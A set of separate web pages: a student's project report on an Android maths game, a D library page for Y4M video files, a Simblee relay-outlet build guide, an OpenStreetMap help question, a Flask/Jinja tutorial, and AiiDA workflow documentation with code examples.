                assert workchain.is_finished_ok

The self.ctx.workchains list holds the work chains, in the same order as they had been inserted, and so in the inspect_workchains step we can simply iterate over it to access all of them. Note that the use of append_ is not just limited to the to_context method. You can also use it in exactly the same way with ToContext to append a process to a list in the context in multiple outline steps.

Reporting¶

During the execution of a work chain, you may want to log messages about its progress. For this purpose the work chain provides the report() method, which takes a message and attaches it as a log to the node that represents the work chain. This allows the verdi process report command to retrieve all those messages that were fired using the report method for a specific process.
Note that the report method, in addition to the pk of the work chain, will also automatically record the name of the work chain and the name of the outline step in which the report message was fired. This information will show up in the output of verdi process report, so you never have to explicitly reference the work chain.

Aborting and exit codes¶

At the end of every outline step, the return value will be inspected by the engine. If a non-zero integer value is detected, the engine will interpret this as an exit code and will stop the execution of the work chain, while setting its process state to Finished. In addition, the integer return value will be set as the exit_status of the work chain, which, combined with the Finished process state, will denote that the work chain is considered to be Failed, as explained in the section on the process state. This is useful because it allows a workflow designer to easily exit from a work chain and use the return value to communicate programmatically the reason for the work chain stopping. We assume that you have read the section on how to define exit codes through the process specification of the work chain. Consider the following example work chain, which submits a CalcJob and inspects whether it finished successfully:

    # -*- coding: utf-8 -*-
    from aiida.engine import WorkChain, ToContext

    class SomeWorkChain(WorkChain):

        @classmethod
        def define(cls, spec):
            super().define(spec)
            spec.outline(
                cls.submit_calculation,
                cls.inspect_calculation,
            )
            spec.exit_code(400, 'ERROR_CALCULATION_FAILED', 'the calculation did not finish successfully')

        def submit_calculation(self):
            node = self.submit(SomeCalcJob)
            return ToContext(calculation=node)

        def inspect_calculation(self):
            if not self.ctx.calculation.is_finished_ok:
                return self.exit_codes.ERROR_CALCULATION_FAILED

Returning this exit code, which will be an instance of the ExitCode class, will cause the work chain to be aborted and the exit_status and exit_message to be set on the node, which were defined in the spec.

Note: The notation self.exit_codes.ERROR_CALCULATION_FAILED is just syntactic sugar to retrieve the ExitCode instance that was defined in the spec with that error label. Constructing your own ExitCode directly and returning that from the outline step will have exactly the same effect in terms of aborting the work chain execution and setting the exit status and message. However, it is strongly advised to define the exit code through the spec and retrieve it through the self.exit_codes collection, as that makes it easily retrievable through the spec by the caller of the work chain.
The message attribute of an ExitCode can also be a string that contains placeholders. This is useful when the exit code's message is generic enough to apply to a host of situations, but one would just like to parameterize the exit message. To concretize the template message of an exit code, simply call the format() method and pass the parameters as keyword arguments:

    exit_code_template = ExitCode(450, 'the parameter {parameter} is invalid.')
    exit_code_concrete = exit_code_template.format(parameter='some_specific_key')

This concept can also be applied within the scope of a process. In the process spec, we can declare a generic exit code whose exact message should depend on one or multiple parameters:

    spec.exit_code(450, 'ERROR_INVALID_PARAMETER', 'the parameter {parameter} is invalid.')

Through the self.exit_codes collection of a WorkChain, this generic exit code can be easily customized as follows:

    def inspect_calculation(self):
        return self.exit_codes.ERROR_INVALID_PARAMETER.format(parameter='some_specific_key')

This is no different than the example before, because self.exit_codes.ERROR_INVALID_PARAMETER simply returns an instance of ExitCode, which we then call format on with the substitution parameters. In conclusion, the best part about using exit codes to abort a work chain's execution is that the exit status can now be used programmatically, by, for example, a parent work chain. Imagine that a parent work chain submitted this work chain. After it has terminated its execution, the parent work chain will want to know what happened to the child work chain. As already noted in the report section, the report messages of the work chain should not be used. The exit status, however, is a perfect way. The parent work chain can easily request the exit status of the child work chain through the exit_status property, and based on its value determine how to proceed.
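The placeholder mechanics above are ordinary Python string formatting. As an illustrative aside, stripped of AiiDA entirely, the pattern can be sketched with a stand-in ExitCode (the namedtuple and the format_exit_code helper here are mock-ups for illustration, not the real aiida.engine API):

```python
from collections import namedtuple

# Stand-in with the two fields discussed in the text; the real
# aiida.engine.ExitCode carries more functionality than this.
ExitCode = namedtuple('ExitCode', ['status', 'message'])

def format_exit_code(template, **kwargs):
    # Substitute the placeholders in the message, keeping the status unchanged
    return ExitCode(template.status, template.message.format(**kwargs))

exit_code_template = ExitCode(450, 'the parameter {parameter} is invalid.')
exit_code_concrete = format_exit_code(exit_code_template, parameter='some_specific_key')

print(exit_code_concrete.message)  # the parameter some_specific_key is invalid.
```

The real ExitCode exposes this substitution as its own format() method, but the underlying behaviour is the same str.format call shown here.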
Exposing inputs and outputs¶

Consider the following example work chain, which simply takes a few inputs and returns them again as outputs:

    # -*- coding: utf-8 -*-
    from aiida.orm import Bool, Float, Int
    from aiida.engine import WorkChain

    class ChildWorkChain(WorkChain):

        @classmethod
        def define(cls, spec):
            super().define(spec)
            spec.input('a', valid_type=Int)
            spec.input('b', valid_type=Float)
            spec.input('c', valid_type=Bool)
            spec.outline(cls.do_run)
            spec.output('d', valid_type=Int)
            spec.output('e', valid_type=Float)
            spec.output('f', valid_type=Bool)

        def do_run(self):
            self.out('d', self.inputs.a)
            self.out('e', self.inputs.b)
            self.out('f', self.inputs.c)

As a first example, we will implement a thin wrapper work chain that simply forwards its inputs to the child and forwards the outputs of the child as its own:

    # -*- coding: utf-8 -*-
    from aiida.engine import ToContext, WorkChain, run
    from child import ChildWorkChain

    class SimpleParentWorkChain(WorkChain):

        @classmethod
        def define(cls, spec):
            super().define(spec)
            spec.expose_inputs(ChildWorkChain)
            spec.expose_outputs(ChildWorkChain)
            spec.outline(cls.run_child, cls.finalize)

        def run_child(self):
            child = self.submit(ChildWorkChain, **self.exposed_inputs(ChildWorkChain))
            return ToContext(child=child)

        def finalize(self):
            self.out_many(self.exposed_outputs(self.ctx.child, ChildWorkChain))

In the define method of this parent work chain, we use the expose_inputs() and expose_outputs() methods. This creates the corresponding input and output ports in the parent work chain. Additionally, AiiDA remembers which inputs and outputs were exposed from that particular work chain class, which is used when retrieving the exposed inputs and passing on the exposed outputs in the outline steps. This work chain can now be run in exactly the same way as the child itself:

    #!/usr/bin/env runaiida
    # -*- coding: utf-8 -*-
    from aiida.orm import Bool, Float, Int
    from aiida.engine import run
    from simple_parent import SimpleParentWorkChain

    if __name__ == '__main__':
        result = run(SimpleParentWorkChain, a=Int(1), b=Float(1.2), c=Bool(True))
        print(result)
        # {'e': 1.2, 'd': 1, 'f': True}

Next, we will see how a more complex parent work chain can be created by using the additional features of the expose functionality. The following script shows how such a work chain can be run:

    #!/usr/bin/env runaiida
    # -*- coding: utf-8 -*-
    from aiida.orm import Bool, Float, Int
    from aiida.engine import run
    from complex_parent import ComplexParentWorkChain

    if __name__ == '__main__':
        result = run(
            ComplexParentWorkChain,
            a=Int(1),
            child_1=dict(b=Float(1.2), c=Bool(True)),
            child_2=dict(b=Float(2.3), c=Bool(False))
        )
        print(result)
        # {
        #     'e': 1.2,
        #     'child_1.d': 1, 'child_1.f': True,
        #     'child_2.d': 1, 'child_2.f': False
        # }

This is achieved by the following work chain. In the next section, we will explain each of the steps.
    # -*- coding: utf-8 -*-
    from aiida.engine import ToContext, WorkChain, run
    from child import ChildWorkChain

    class ComplexParentWorkChain(WorkChain):

        @classmethod
        def define(cls, spec):
            super().define(spec)
            spec.expose_inputs(ChildWorkChain, include=['a'])
            spec.expose_inputs(ChildWorkChain, namespace='child_1', exclude=['a'])
            spec.expose_inputs(ChildWorkChain, namespace='child_2', exclude=['a'])
            spec.outline(cls.run_children, cls.finalize)
            spec.expose_outputs(ChildWorkChain, include=['e'])
            spec.expose_outputs(ChildWorkChain, namespace='child_1', exclude=['e'])
            spec.expose_outputs(ChildWorkChain, namespace='child_2', exclude=['e'])

        def run_children(self):
            child_1_inputs = self.exposed_inputs(ChildWorkChain, namespace='child_1')
            child_2_inputs = self.exposed_inputs(ChildWorkChain, namespace='child_2', agglomerate=False)
            child_1 = self.submit(ChildWorkChain, **child_1_inputs)
            child_2 = self.submit(ChildWorkChain, a=self.inputs.a, **child_2_inputs)
            return ToContext(child_1=child_1, child_2=child_2)

        def finalize(self):
            self.out_many(self.exposed_outputs(self.ctx.child_1, ChildWorkChain, namespace='child_1'))
            self.out_many(self.exposed_outputs(self.ctx.child_2, ChildWorkChain, namespace='child_2', agglomerate=False))

See also: For further practical examples of creating workflows, see the how to write workflows and how to write error resistant workflows sections.
https://aiida.readthedocs.io/projects/aiida-core/zh_CN/latest/topics/workflows/usage.html
Return the file descriptor for a stream

#include <stdio.h>
int fileno( FILE * stream );

Library: libc. Use the -l c option to qcc to link against this library. This library is usually included automatically.

The fileno() function returns the file descriptor for the specified file stream. This file descriptor can be used in POSIX input/output calls anywhere the value returned by open() can be used. To associate a stream with a file descriptor, call fdopen().

The following symbolic values in <unistd.h> define the file descriptors associated with the C language stdin, stdout, and stderr streams: STDIN_FILENO (0), STDOUT_FILENO (1), and STDERR_FILENO (2).

#include <stdlib.h>
#include <stdio.h>

int main( void )
{
    FILE *stream;

    stream = fopen( "file", "r" );
    if( stream != NULL ) {
        printf( "File number is %d.\n", fileno( stream ) );
        fclose( stream );
        return EXIT_SUCCESS;
    }

    return EXIT_FAILURE;
}

This program produces output similar to:

File number is 7.
http://www.qnx.com/developers/docs/6.6.0.update/com.qnx.doc.neutrino.lib_ref/topic/f/fileno.html
So I would like to create a battleship program with Python. I have some of it finished already but I would like to create a nice graphical interface for it. This would show the user the board and they would be able to select a grid. I was wondering if anyone could recommend a good library for this. It will be in Python 3. Here is what I have so far by the way.

import random

board = []

for x in range(0,5):
    board.append(["O"] * 5)

def print_board(board):
    for row in board:
        print (" ".join(row))

print ("Let's play Battleship!")
print_board(board)

def random_row(board):
    return random.randint(0,len(board)-1)

def random_col(board):
    return random.randint(0,len(board[0])-1)

ship_row = random_row(board)
ship_col = random_col(board)
print (ship_row)
print (ship_col)

for turn in range(4):
    guess_row = int(input("Guess Row:"))
    guess_col = int(input("Guess Col:"))
    if guess_row == ship_row and guess_col == ship_col:
        print ("Congratulations! You sunk my battleship!")
        break
    else:
        if (guess_row < 0 or guess_row > 4) or (guess_col < 0 or guess_col > 4):
            print ("Oops, that's not even in the ocean.")
        elif (board[guess_row][guess_col] == "X"):
            print ("You guessed that one already.")
        else:
            print ("You missed my battleship!")
            board[guess_row][guess_col] = "X"
        if turn == 4:
            print ("Game Over")
    print (turn + 1)
    print_board(board)
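Whichever GUI library ends up being used, one refactor that tends to help is pulling the guess-handling out of the input loop into a plain function, so the same logic can drive both the console version and a click-on-a-grid version later. This is just a sketch; evaluate_guess is a made-up name and not part of the code above:

```python
def evaluate_guess(board, ship, guess):
    # Classify a guess as "hit", "off-board", "repeat" or "miss",
    # marking misses on the board exactly as the loop above does.
    row, col = guess
    if guess == ship:
        return "hit"
    if not (0 <= row < len(board) and 0 <= col < len(board[0])):
        return "off-board"
    if board[row][col] == "X":
        return "repeat"
    board[row][col] = "X"
    return "miss"

board = [["O"] * 5 for _ in range(5)]
print(evaluate_guess(board, (2, 2), (2, 2)))  # hit
print(evaluate_guess(board, (2, 2), (9, 0)))  # off-board
print(evaluate_guess(board, (2, 2), (1, 1)))  # miss
print(evaluate_guess(board, (2, 2), (1, 1)))  # repeat
```

A GUI callback for a grid button at (row, col) would then just call this function and display the returned string, with no game logic living inside the interface code.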
http://www.dreamincode.net/forums/topic/339693-battleship/
Type System (XQuery)

Updated: August 10, 2016

Applies To: SQL Server (starting with 2008), Azure SQL Database, Azure SQL Data Warehouse, Parallel Data Warehouse

XQuery is a strongly-typed language for schema types and a weakly-typed language for untyped data. The predefined types of XQuery include the following:

- Built-in types of XML schema in the http://www.w3.org/2001/XMLSchema namespace.
- Types defined in the http://www.w3.org/2004/07/xpath-datatypes namespace.

This topic also describes the following:

- The typed value versus the string value of a node.
- The data Function (XQuery) and the string Function (XQuery).
- Matching the sequence type returned by an expression.

The built-in types of XML schema have a predefined namespace prefix of xs. Some of these types include xs:integer and xs:string. All these built-in types are supported. You can use these types when you create an XML schema collection. When querying typed XML, the static and dynamic type of the nodes is determined by the XML schema collection associated with the column or variable that is being queried. For more information about static and dynamic types, see Expression Context and Query Evaluation (XQuery). For example, the following query is specified against a typed xml column (Instructions). The expression uses instance of to verify that the typed value of the LotSize attribute returned is of xs:decimal type.

SELECT Instructions.query('
    declare namespace AWMI="";
    data(/AWMI:root[1]/AWMI:Location[@LocationID=10][1]/@LotSize)[1] instance of xs:decimal
') AS Result
FROM Production.ProductModel
WHERE ProductModelID=7

This typing information is provided by the XML schema collection associated with the column. The types defined in the http://www.w3.org/2004/07/xpath-datatypes namespace have a predefined prefix of xdt. The following applies to these types:

- You cannot use these types when you are creating an XML schema collection.
- These types are used in the XQuery type system and are used for XQuery and Static Typing.
- You can cast to the atomic types, for example, xdt:untypedAtomic, in the xdt namespace.
When querying untyped XML, the static and dynamic type of element nodes is xdt:untyped, and the type of attribute values is xdt:untypedAtomic. The result of a query() method generates untyped XML. This means that the XML nodes are returned as xdt:untyped and xdt:untypedAtomic, respectively. The xdt:dayTimeDuration and xdt:yearMonthDuration types are not supported. In the following example, the query is specified against an untyped XML variable. The expression, data(/a[1]), returns a sequence of one atomic value. The data() function returns the typed value of the element <a>. Because the XML being queried is untyped, the type of the value returned is xdt:untypedAtomic. Therefore, instance of returns true. Instead of retrieving the typed value, the expression ( /a[1]) in the following example returns a sequence of one element, element <a>. The instance of expression uses the element test to verify that the value returned by the expression is an element node of xdt:untyped type. DECLARE @x xml SET @x='<a>20</a>' -- Is this an element node whose name is "a" and type is xdt:untyped. SELECT @x.query( '/a[1] instance of element(a, xdt:untyped?)') -- Is this an element node of type xdt:untyped. SELECT @x.query( '/a[1] instance of element(*, xdt:untyped?)') -- Is this an element node? SELECT @x.query( '/a[1] instance of element()') Every node has a typed value and a string value. For typed XML data, the type of the typed value is provided by the XML schema collection associated with the column or variable that is being queried. For untyped XML data, the type of the typed value is xdt:untypedAtomic. You can use the data() or string() function to retrieve the value of a node: The data Function (XQuery) returns the typed value of a node. The string Function (XQuery) returns the string value of the node. 
In the following XML schema collection, the <root> element is defined to be of the integer type. In the following example, the expression first retrieves the typed value of /root[1] and then adds 3 to it. In the next example, the expression fails, because the string(/root[1]) in the expression returns a string type value. This value is then passed to an arithmetic operator that takes only numeric type values as its operands. The following example computes the total of the LaborHours attributes. The data() function retrieves the typed values of LaborHours attributes from all the <Location> elements for a product model. According to the XML schema associated with the Instructions column, LaborHours is of xs:decimal type. This query returns 12.75 as the result.
https://msdn.microsoft.com/en-us/library/ms177483.aspx
Code Tutorial: Getting started with Python in the lab

This series grew out of my previous article. In starting these code tutorials for life science computing, I hope to point life scientists with relatively little exposure to programming languages in the right direction, so that they can start using these tools to write useful code that solves real problems. In this tutorial we will create a simple program that can predict the pattern of single-strand DNA fragments that you would expect on your electrophoresis gel after doing a restriction digest. So without further ado, let's introduce one of our favorite programming languages, Python.

Python is an incredibly versatile programming environment, well suited to creating solutions from small scripts of a few lines in length, to large scale applications that are used throughout global organizations. The Python development environment is freely available for download from the official Python web site. For users of Windows and Mac OS X platforms, Python comes in nice self-installing packages that pretty much do everything for you. For Linux users doing a manual install, you will need to unzip the install package and run a shell script or (more conveniently), you could just do a one-click install with one of the excellent software package managers that come with most Linux OS distributions. The good news for Linux users is that chances are, your Linux OS already comes with Python included, and if you're running your own Linux system, you probably don't need our help installing stuff anyway!

We'll be writing our code using the nice clean IDLE development environment that comes with Python. IDLE is really a kind of specialized text editor that can actually run the Python code you type into it. On Mac OS X or Linux, it can be launched from a terminal window (usually by just typing "idle" if everything is installed and configured correctly).
On Windows you will probably need to launch it from the command line ("run") window. Is IDLE running now? Congratulations, you just ran your first Python application, because IDLE itself is actually written in Python!

Just Do It

So let's start by creating a (very) simple DNA sequence in Python. In IDLE, type the following line and hit the return key

mysequence = "atcg"

In programming jargon, 'mysequence' is a string of 4 characters. IDLE will probably color code the "atcg" part to show this. Now type the following and hit return

len(mysequence)

If everything went well, IDLE should now display the number 4, which is the length of the string in characters returned by the 'len' function. Now try typing the following lines. Make sure you indent the 'print ch' line by one tab space just as I have done, and you will have to hit the return key twice after the 'print ch' line to actually run the code.

for ch in mysequence:
    print ch

You should now see your sequence printed out in order, one character per line, like this

a
t
c
g

The code you just typed translates into English as "for each item in 'mysequence', give the item the temporary name 'ch', then print 'ch'". This kind of loop construction is known as an iterator in Python. Python knows that strings are made up of smaller items, in this case characters, so when you iterate over a string using the 'for' command, the iterator returns each character in the string, in order of occurrence. I used the name 'ch' because the items in this case are characters, but I could just as easily have used any other name like 'item' or 'c' or 'roger_the_shrubber'. The indent in the 'print ch' line is significant. Indents are the way to create blocks of code in Python that are to be executed all together.
Every line of code that is indented by one level underneath the 'for' statement gets executed on each round trip through the loop, so if we had, for example, also wanted to print the position of the nucleotide in the sequence, we could have added one or two more indented lines under the 'for' statement like this

i = 0
for ch in mysequence:
    print ch
    print i
    i += 1

In this modified version, a variable i is declared before the loop and then also printed and incremented by 1 on each pass through the loop. The 'i += 1' syntax is Python shorthand for 'i = i + 1'. The important thing to note here is that all 3 of the indented lines are executed for each pass through the loop. The output from the loop now looks like this

a
0
t
1
c
2
g
3

If we were to unindent the 'i += 1' line, this would remove it from the loop and it would become the first line to be executed after all the passes through the loop had been completed. Can you figure out how this would change the output printed by the loop?

Let's bring in the string section

Another feature of strings (and all list-based objects in Python) is that their characters/items can also be accessed according to their numerical position in the object, starting from 0 (all lists, sequences, arrays and so on in Python are numbered from 0), up to 1 minus the length of the object. So mysequence[0] = 'a', mysequence[1] = 't' and so on. You can also slice strings up using [from:to] syntax like this

name = "Arthur King"
print len(name)
11
print name[0:6]
Arthur
print name[:6]
Arthur
print name[7:11]
King
print name[7:]
King
print name[-4:]
King

Note the following features of Python indices: the last number in the 'from:to' range is exclusive; if the 'from' or 'to' index is excluded, the beginning or end of the string/list is assumed; a negative index for a string/list denotes the position -n from the end of the string.
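As an aside, Python also has a built-in that does the counter bookkeeping from the last example for you. The tutorial above sticks to Python 2's print statement; this little extra is written in Python 3 syntax, and enumerate itself is standard in both:

```python
mysequence = "atcg"

# enumerate yields (position, item) pairs, replacing the manual i += 1
for i, ch in enumerate(mysequence):
    print(i, ch)
# 0 a
# 1 t
# 2 c
# 3 g
```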
Dictionaries are your friend

So now we know how to create DNA sequences as strings and how to iterate over them, let's introduce the Python dictionary. Dictionaries resemble in some aspects the kind of list object that we already encountered in strings, but instead of the items being labeled according to their numerical positions, they can be labeled pretty much any old way we choose. For example ...

mydictionary = {"galahad":"pure","lancelot":"brave"}

Now if you type

print mydictionary["lancelot"]

you get 'brave' and so on. Dictionaries are composed of 'key:value' pairs and the stored value for each key can be accessed using the mydictionary[key] syntax. Dictionaries can also be added to like this

mydictionary["bedevere"] = "wise"

So now let's create a dictionary to store the molecular weights of the 4 standard DNA nucleotides

nucleotides = {'a':131.2,'t':304.2,'c':289.2,'g':329.2}

Note that we used single quotes here. Python allows both single and double quotes to be used interchangeably, but the closing quote must be the same as the opening quote. What this dictionary does in effect, is to translate the symbol for the nucleotide into a molecular weight, for example

print nucleotides['t']

prints the value

304.2

So now we are in a position to actually do a useful calculation. By combining the 'for' iterator for our sequences and the nucleotide dictionary, we can calculate the molecular weight of any DNA sequence. Here's how ...

molecularweight = 0.0
for ch in mysequence:
    molecularweight += nucleotides[ch]
print molecularweight

When you run this code, you get the molecular weight for our little 4 nucleotide sequence

1053.8

Now we could also do all kinds of fancy stuff like adding the molecular weight of a 5' phosphate if one is present, or accounting for DNA adducts or chemically modified bases, but you get the general idea.
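The same lookup pattern handles any symbol-to-symbol translation. As an extra illustration that is not part of the tutorial's weight calculation, a dictionary can also serve as a base-complement table:

```python
# Map each nucleotide to its Watson-Crick complement
complement = {'a': 't', 't': 'a', 'c': 'g', 'g': 'c'}

mysequence = "atcg"
comp = ""
for ch in mysequence:
    comp += complement[ch]

print(comp)  # tagc
```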
Organize your code with functions

Since we're going to want to use the same molecular weight calculation on different sequences, let's create a Python function that takes a DNA sequence as input and returns its molecular weight.

def calculateMolecularWeight(sequence):
    molecularWeight = 0.0
    for ch in sequence:
        molecularWeight += nucleotides[ch]
    return molecularWeight

In Python the 'def' statement defines a function by its name 'calculateMolecularWeight' and by the parameters that it takes as input - in this case a single parameter 'sequence'. Note that Python is a dynamically typed language that does not require you to define what kind of data 'sequence' is before you run it, so the calculateMolecularWeight function would happily accept an integer like 2 as the input parameter, but it would raise an error when it tried to process it since an integer has no items in it for the 'for' loop to iterate over. Notice also how all of the code that forms the body of the function is indented (with the code in the 'for' loop being indented one more level still). The 'return' statement in a function does two things - it exits the function and if it is accompanied by a parameter as in this case, it sets the return value of the function to that parameter. Now that we have our function, we can calculate the molecular weight for any DNA sequence that we give it as an input parameter, like this

mwt = calculateMolecularWeight(mysequence)

or we can even supply the sequence parameter explicitly like this

mwt = calculateMolecularWeight("gatgctgtggataa")
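Putting the dictionary and the function together gives a self-contained check that reproduces the 1053.8 figure from earlier (rounded to one decimal place to sidestep floating point noise):

```python
# Molecular weights of the 4 standard DNA nucleotides, as above
nucleotides = {'a': 131.2, 't': 304.2, 'c': 289.2, 'g': 329.2}

def calculateMolecularWeight(sequence):
    molecularWeight = 0.0
    for ch in sequence:
        molecularWeight += nucleotides[ch]
    return molecularWeight

# The 4-mer from the start of the tutorial
print(round(calculateMolecularWeight("atcg"), 1))  # 1053.8
```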
For example bamH1 = "ggatcc"sma1 = "cccggg" but in addition to the restriction enzyme's recognition motif, we also need to include information about where the enzyme cuts the DNA strand within the motif, so let's exapnd our deinition of a restriction site by using the very versatile list format that Python offers. bamH1 = ["ggatcc",0]sma1 = ["cccggg",2] Lists can be formed by grouping items in square brackets as shown above. Python lists can contain other Python objects of any kind - even other Python lists! The second item (an integer) in our restriction site definition is the position in the motif after which the enzyme cuts the DNA (again numbering from 0 as the first position). The items in lists can be accessed by their positions, just like the characters in a string, so typing print sma1[1] returns the value 2 Remember that Python lists are numbered from 0, so 'sma1[1]' is actually the 2nd item in the list. Now that we have our restriction sites, we need a way to search for them in a DNA sequence. Fortunately there is a very handy 'find' method for Python strings that does exactly what we want to do. The 'find' method is a property of strings in Python and such a property can be accessed using the dot notation like this position = mysequence.find("tag") This looks for the next occurrence of the amber stop codon in 'mysequence' and returns its position in the sequence. If the search motif is not found, 'find' returns the value -1. Notice the phrase 'next occurrence' above. The 'find' method returns the position of the first occurrence of the search motif that it finds. If you want to look for multiple occurrences, an additional parameter can be supplied to 'find' to tell it which position in the sequence to start searching from, like this position = mysequence.find("tag",172) Then for example, if you find the first stop codon at position 172, you can search again from that position to look for the next occurrence and so on. 
If no position parameter is supplied to 'find' (as in the first example), the search is always done from the beginning of the string. The .find syntax works for any Python string because in object-oriented programming (OOP) terms, 'mysequence' belongs to the general string class and 'find' is a method defined for that class. We will hardly delve at all into OOP in this introductory tutorial, except to say that Python is an OOP language and with a little OOP knowledge there are ways that we could write the code in this tutorial much more cleanly and elegantly in an OOP style. For instance, we could define our own DNA sequence and restriction site classes, with their own properties and methods. Fortunately for us however, unlike some other OOP languages, Python does not force the programmer to work in an OOP style all the time, so we can learn just the general nuts and bolts of Python for now and save OOP for another day.

We already have our molecular weight function, so let's add another function for doing restriction digests of our sequences. This function will take a sequence and a restriction site definition as input and return a list of the digested DNA fragments. Here it is ...

def digestDNA(sequence,rs):
    frags = []
    last = 0
    while 1:
        i = sequence.find(rs[0],last)
        if i == -1:
            frags.append(sequence[last:])
            break
        else:
            frags.append(sequence[last:i+rs[1]])
            last = i+rs[1]
    return frags

The line 'frags = []' creates an empty list that we will use to store our DNA fragments. The variable 'last' will be used to record the last place that we found the restriction site defined in 'rs'. Initially, 'last' must obviously be set to 0 so that the search starts at the beginning of the sequence. The Python 'while' command is another kind of iterative loop that works differently from the 'for' loop that we have already encountered. The 'while' loop will continue to cycle for as long as the condition after 'while' is true.
It is easier to understand how the 'while' loop works by studying this example

x = 0
while x < 10:
    print x
    x += 1

This loop will print the numbers from 0 to 9 and then stop once x reaches 10. In our function however, we don't seem to have any condition at all after 'while', but just a rather mysterious integer, the number 1. The reason for this is that integers in Python can be used as shorthand for true or false, where an integer greater or less than 0 is 'true', with 0 being 'false'. In our function then, the loop would seem to run forever since 1 is always true and never gets changed. If you look in the indented body of the loop however, you will see the 'break' command which exits the loop. The loop in our function is essentially configured to run forever, until we encounter the situation where there are no more occurrences of the restriction site motif (in which case sequence.find() returns -1) and then we simply add the remainder of the sequence to our list of fragments and exit the loop using the 'break' command. The 'if' construct tests whether the value returned from 'find' equals -1. Notice that in the conditional statement we use 'i == -1' which means "return 'true' if i equals -1 or 'false' if not", as opposed to "i = -1" which means "set the value of i to -1". If the condition following 'if' is true, everything in the indented 'if' block is done. The 'else' block is a way to tell Python what to do in the event that the 'if' condition is false. In our case, if 'find' does find another occurrence of the restriction site, we use the restriction site cut position to define the new fragment we're generating, we add the new fragment to our fragment list using the 'append' method that is a property of Python lists, and we update the 'last' variable so that the next search for the restriction site will continue from the position of its last occurrence. Pretty simple right?

All together now ...
Now we can finally put it all together to create a Python script that will calculate the molecular weights of the DNA fragments produced by a restriction digest. You will notice that the 'digestDNA' function returns a list of DNA sequences, so after we have run the function, we can use our iterative 'for' loop to go through the returned list of fragments one at a time and calculate the molecular weight of each one, like this

for fragment in digestDNA(s,sma1):
    print fragment
    print calculateMolecularWeight(fragment)

Notice that instead of assigning the return value of the 'digestDNA' function to a variable and then iterating over the variable like this

fragmentList = digestDNA(s,sma1)
for fragment in fragmentList:
    ...

... we just used the function itself directly where the variable would go. This is perfectly OK to do in Python and in fact, it is often good form to do this to make the code more concise and readable. So let's create a fake sequence with a couple of SmaI restriction sites in it and test our code.

s = "atcgatcgatcgcccgggatcgatcgcccgggatcgatcgatcg"
for fragment in digestDNA(s,sma1):
    print fragment
    print calculateMolecularWeight(fragment)

If everything went well, running this code should yield the following output

atcgatcgatcgcc
3739.8
cgggatcgatcgcc
3962.8
cgggatcgatcgatcg
4438.2

If we wanted to do a multiple digest, for each additional restriction site, we could apply the same approach to the fragments generated by the previous digest(s). In this case, we could write our code in such a way that it could be applied recursively to our original sequence and the subsequent fragments. Recursive methods are easy to write in Python, but we'll save recursion for a future tutorial. One of the great things about Python is that it is a very popular language with a large and flourishing community.
This means that for most problem domains, including the life sciences, somebody somewhere has probably already developed a library of Python functions for your particular problem. As you might have guessed, there already exist Python libraries for the kind of bioinformatics problems that we have tackled here. Since the goal here was to learn enough basic Python to be able to write some useful code, we did not rely on any of them for our simple problem. Here are some links however, to give you an idea of the kinds of life science libraries that are available in Python. Biopython - a set of freely available tools for biological computation Biskit - an object-oriented library for structural bioinformatics research SciPy - a library for mathematics, science, and engineering, with many useful algorithms for life science computing This list is by no means exhaustive, but it gives some idea of the universe of useful Python tools that are available to the life scientist. Don't stop there! So now that you have hopefully seen enough to appreciate how easy it can be to write useful code, we encourage you not to stop here. We will be publishing future tutorials, but in the meantime, why not head on over and browse the many fantastic references, tutorials and other resources for new Python users that can be found at the documentation area of the Python web site.
https://www.digitalbiologist.com/blog/2011/04/code-tutorial-getting-started-with-python.html
CC-MAIN-2019-18
refinedweb
3,202
53.65
java.lang.Object
  com.tangosol.util.Base
    com.tangosol.io.pof.PofHelper
      com.tangosol.io.pof.RawDate

public class RawDate

An immutable POF date value.

public RawDate(int nYear, int nMonth, int nDay)
    nYear - the year number as defined by ISO8601; note the difference with the Java Date class, whose year is relative to 1900
    nMonth - the month number between 1 and 12 inclusive as defined by ISO8601; note the difference from the Java Date class, whose month value is 0-based (0-11)
    nDay - the day number between 1 and 31 inclusive as defined by ISO8601

public int getYear()
public int getMonth()
public int getDay()
public java.sql.Date toSqlDate()
public java.util.Date toJavaDate()
public boolean equals(java.lang.Object o)
    o - another object to compare to for equality
public int hashCode()
public java.lang.String toString()
https://docs.oracle.com/cd/E24290_01/coh.371/e22843/com/tangosol/io/pof/RawDate.html
CC-MAIN-2021-43
refinedweb
145
54.12
When I get a copy of an XML::Twig::Elt object and I try to apply the namespace method on it I get nothing, even though ns_prefix returns a prefix for the element and that prefix is indeed bound in the XML document. The copy was obtained using:

    my $copy_of_twig = $twig->copy;

Any ideas how to solve this? Thank you.

Can you provide a short stand-alone sample that demonstrates the issue? I know what I mean. Why don't you? may help with tips for putting such a sample together.

A test case would be helpful indeed, but I can try guessing.

    ns_prefix returns a prefix for the element and that prefix is indeed bound in the XML document

Indeed, the prefix is bound in the XML document. But the newly created element is not part of a document. It's just a single detached element as far as XML::Twig is concerned. So it can't get the namespace information from its parent elements. I have to think about it a bit, and see what other libraries do, because possible requirements are a bit hard to all satisfy. At the moment you could probably get the namespace information by keeping a link to the original element in the copied document (stick it in an invisible attribute), and get the namespace info from it:

    $copied->set_att( '#elt', $elt);
    my $namespace = $copied->att( '#elt')->namespace();

In fact I might well use something like that to solve the problem.
XML file:

    <?xml version="1.1"?>
    <a xmlns="default_ns_top">
    <b xmlns:
    <c xmlns:
    <d xmlns:
    <e xmlns:
    </d>
    </a>

a test perl script:

    use strict;
    use warnings;
    use Data::Dumper;
    use XML::Twig;

    my $twig = XML::Twig->new();
    $twig->xparse(shift);
    traverse($twig->root);

    sub traverse {
        my ($t) = @_;
        print "gi=|", $t->gi, "|\tprefix=|", $t->ns_prefix, "|\tnamespace=|", $t->namespace, "|\n";
        foreach my $c ($t->children) {
            if (@ARGV) {
                my $copy = $c->copy;
                traverse($copy);
            } else {
                traverse($c);
            }
        }
    }

Notice the output when you run:

    $ perl test.pl test.xml        # this is behaving OK

But when you run it with a copy:

    $ perl test.pl test.xml copy   # this is not OK

You don't see a lot of namespace information. I'm going to try and use your proposed workaround. Thanks for your help.

    use strict;
    use warnings;
    use Data::Dumper;
    use XML::Twig;

    my $twig = XML::Twig->new();
    $twig->xparse(shift);
    traverse($twig->root);

    sub traverse {
        my ($t) = @_;
        my $elt = $t;
        $elt = $t->att('#elt') if $t->att('#elt');
        print "gi=|", $t->gi, "|\tprefix=|", $elt->ns_prefix, "|\tnamespace=|", $elt->namespace, "|\n";
        foreach my $c ($t->children) {
            if (@ARGV) {
                my $copy = $c->copy;
                $copy->set_att( '#elt', $c);
                traverse($copy);
            } else {
